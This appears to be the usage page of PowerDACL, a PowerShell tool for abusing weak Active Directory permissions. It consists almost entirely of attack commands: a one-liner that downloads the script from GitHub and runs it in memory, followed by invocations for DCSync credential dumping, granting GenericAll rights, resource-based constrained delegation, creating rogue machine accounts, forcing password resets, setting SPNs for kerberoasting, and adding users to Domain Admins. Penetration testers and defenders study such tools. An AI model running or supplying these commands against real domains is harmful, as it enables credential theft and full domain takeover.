A tool to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Access Control Entries (ACEs)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/PowerDACL/main/PowerDACL.ps1')
PowerDACL
DCSync -Target username
DCSync -Target username -TargetDomain userdomain
GenericAll -Target MSSQL01$ -Grantee username
GenericAll -Target MSSQL01$ -TargetDomain acme.local -Grantee username -GranteeDomain domain.local
RBCD -Target MSSQL01$ -Grantee username
RBCD -Target MSSQL01$ -TargetDomain domain.local -Grantee username -GranteeDomain acme.local
RBCD -Target MSSQL01$ -Clear
AddComputer -ComputerName evilcomputer -Password P@ssw0rd!
AddComputer -ComputerName evilcomputer -Password P@ssw0rd! -Domain ferrari.local
DeleteComputer -ComputerName evilcomputer
DeleteComputer -ComputerName evilcomputer -Domain ferrari.local
ForceChangePass -Target username -Password P@ssw0rd!
ForceChangePass -Target username -Password P@ssw0rd! -TargetDomain usserdomain
SetSPN -Target username
SetSPN -Target username -TargetDomain userdomain -SPN "test/test"
RemoveSPN -Target username
RemoveSPN -Target username -TargetDomain userdomain
SetOwner -Target MSSQL01$ -Owner username
SetOwner -Target MSSQL01$ -TargetDomain acme.local -Owner username -OwnerDomain domain.local
EnableAccount -Target myComputer$
EnableAccount -Target myComputer$ -Domain userdomain
DisableAccount -Target myComputer$
DisableAccount -Target myComputer$ -Domain userdomain
AddToGroup -Target user -Group "Domain Admins"
AddToGroup -Target user -Group "Domain Admins" -Domain userdomain
RemoveFromGroup -Target user -Group "Domain Admins"
RemoveFromGroup -Target user -Group "Domain Admins" -Domain userdomain